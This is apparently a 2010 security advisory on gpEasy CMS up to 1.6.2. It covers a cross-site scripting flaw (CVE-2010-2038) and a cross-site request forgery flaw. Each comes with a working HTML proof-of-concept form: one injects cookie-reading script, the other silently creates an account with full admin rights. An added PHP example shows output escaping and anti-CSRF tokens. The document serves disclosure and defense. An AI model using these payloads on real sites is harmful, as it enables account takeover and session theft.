High-Tech Bridge advisory HTB22370
Published: May 05, 2010

Multiple Vulnerabilities in gpEasy CMS

High-Tech Bridge
www.htbridge.com
CVSS2: 2.1 Low
  Access Vector: NETWORK
  Access Complexity: HIGH
  Authentication: SINGLE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE
  Vector: AV:N/AC:H/Au:S/C:N/I:P/A:N

EPSS: 0.001 Low (percentile 50.9%)

High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in gpEasy CMS which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

  1. Cross-site scripting vulnerability in gpEasy CMS: CVE-2010-2038
    The vulnerability exists due to an input sanitization error in the HTTP POST parameter "gpcontent" in include/tool/editing_files.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
    Exploitation example:
    <form method="POST" action="http://example.com/index.php/Home" name="myfrm">
    <input type="hidden" name="cmd" value='save'>
    <input type="hidden" name="gpcontent" value='text"><script>alert(document.cookie)</script>'>
    </form>
    <script>
    document.myfrm.submit();</script>

  2. Cross-site request forgery (CSRF) in gpEasy CMS
    The vulnerability exists due to insufficient validation of the request origin in include/admin/admin_users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and create an account with arbitrary privileges within the application. Successful exploitation might result in complete compromise of the application.
    Exploitation example:
    <form action="http://example.com/index.php/Admin_Users" method="post" name="myfrm">
    <input type="hidden" name="cmd" value="ResetDetails" >
    <input type="hidden" name="username" value="editor" >
    <input type="hidden" name="email" value="[email protected]" >
    <input type="hidden" name="grant[]" value="Admin_Menu" >
    <input type="hidden" name="grant[]" value="Admin_Uploaded" >
    <input type="hidden" name="grant[]" value="Admin_Extra" >
    <input type="hidden" name="grant[]" value="Admin_Theme" >
    <input type="hidden" name="grant[]" value="Admin_Users" >
    <input type="hidden" name="grant[]" value="Admin_Configuration" >
    <input type="hidden" name="grant[]" value="Admin_Trash" >
    <input type="hidden" name="grant[]" value="Admin_Uninstall" >
    <input type="hidden" name="grant[]" value="Admin_Addons" >
    <input type="hidden" name="grant[]" value="Admin_New" >
    <input type="hidden" name="grant[]" value="Admin_Theme_Content" >
    <input type="hidden" name="aaa" value="Continue" >
    </form>
    <script>
    document.myfrm.submit();
    </script>
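
A defensive counterpart to the two items above, as an added example that is not part of the advisory and not gpEasy's own code: encode the submitted value when it is written back into markup, and require a per-session token on state-changing POST requests. The function names, the csrf_token field and the arrays standing in for $_SESSION and $_POST are assumptions; PHP 7.0 or later is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; none of these names come from gpEasy.

/** Encode untrusted text for an HTML body or a quoted attribute value. */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only when the POST carries the token bound to this session. */
function csrf_check(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() rejects array-valued input such as csrf_token[]=x.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

/** Gate a state-changing admin request; returns the HTTP status to send. */
function handle_admin_post(array $session, array $post): int
{
    return csrf_check($session, $post) ? 200 : 403;
}

// Constructed sample input standing in for $_SESSION and $_POST.
$session = [];
$token   = csrf_token($session);
$forged  = ['cmd' => 'ResetDetails', 'username' => 'editor']; // no token
$legit   = $forged + ['csrf_token' => $token];                // own form

printf("cross-site post: %d\n", handle_admin_post($session, $forged));
printf("same-site post:  %d\n", handle_admin_post($session, $legit));

// Item 1: the submitted value is encoded before it reaches the page.
$gpcontent = 'text"><script>alert(document.cookie)</script>';
echo '<input type="hidden" name="gpcontent" value="', html_escape($gpcontent), "\">\n";
```

The token has to be emitted as a hidden field in every form the application itself renders, so that only same-origin pages can supply it.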

CPE
Name        Operator  Version
gpeasy cms  le        1.6.2
